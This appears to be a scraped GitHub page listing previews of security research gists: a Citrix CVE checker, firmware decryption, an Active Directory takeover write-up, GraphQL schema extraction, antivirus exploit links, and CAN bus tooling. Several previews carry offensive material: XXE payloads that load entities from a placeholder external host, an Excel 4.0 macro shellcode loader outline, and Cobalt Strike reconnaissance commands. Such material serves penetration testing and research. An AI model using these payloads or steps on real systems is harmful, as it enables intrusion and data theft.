Skip to content

Instantly share code, notes, and snippets.

View SecurityAddicted's full-sized avatar

Alex SecurityAddicted

47 followers · 13 following
View GitHub Profile
@DeathsPirate
DeathsPirate / cve-2023-3519_checker.nse
Created July 24, 2023 20:57
NSE Script to check the patch status of Citrix NetScaler devices.
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local slaxml = require "slaxml"
description = [[
Checks for the version number of Netscaler Gateway Windows plugin.
]]
author = "DeathsPirate"
@ryancdotorg
ryancdotorg / decrypt.py
Created December 23, 2021 00:05
Decrypt firmware images for (some) EnGenius devices
#!/usr/bin/env python3
import sys
key = b'\xac\x78\x3c\x9e\xcf\x67\xb3\x59'
filename = sys.argv[1]
def decrypter(reference):
n = len(key)
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@me0wday
me0wday / BlindGraphQL.md
Last active December 15, 2024 02:14
Blind Graphql Discovery to Altair Schema

Playing with GraphQL when introspection is disabled

Quick write up on extracting a GraphQL schema when introspection is disabled. Bits and pieces sourced from various sources. Successfully tested on an Apollo instance.

TLDR: Some GraphQL instances provide name autocomplete suggestions. Some peeps have written tools to automate the extraction process. (ref https://youtu.be/nPB8o0cSnvM).

1. Bruteforce schema without introspection

First step is using a tool called clairvoyance by @nikitastupin (https://github.com/nikitastupin/clairvoyance). I found the main repo to lack error handling and support for additional features such as proxy.

@vp777
vp777 / last_modified_detector.sh
Last active October 20, 2020 16:53
A small script that attempts to identify when an http resource was last modified. It achieves that by either using the Last-Modified response header or through binary search on the If-Modified-Since/If-Unmodified-Since request headers.
#!/bin/bash
#not sure how useful If-Modified-Since/If-Unmodified-Since would be if Last-Modified header is not available:)
resource=${1?Missing the URL of the resource}
accuracy=${2:-2} #by default, tries to identify the first 2 most significant metrics, the year and month
function replacer {
local result i pattern replacement
result=$1
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@v-p-b
v-p-b / AV2019.txt
Last active March 5, 2021 16:31
https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html
@Arno0x
Arno0x / shellcode.xlsm
Last active May 13, 2023 23:22
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
@jackm
jackm / can-packages-and-tools.md
Last active April 12, 2025 11:22
Collection of CAN bus packages and tools

Collection of CAN bus packages and tools

This document assumes the use of Linux as the chosen development platform. Items in bold are highly recommended.

It is recommended to use SocketCAN when working with CAN bus on Linux. It is supported by the Linux kernel mainline and follows the Linux interface model, allowing you to use other network tools such as Wireshark. This also allows the creation of virtual CAN interfaces where no physical hardware is required to simulate or replay CAN messages.

@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections: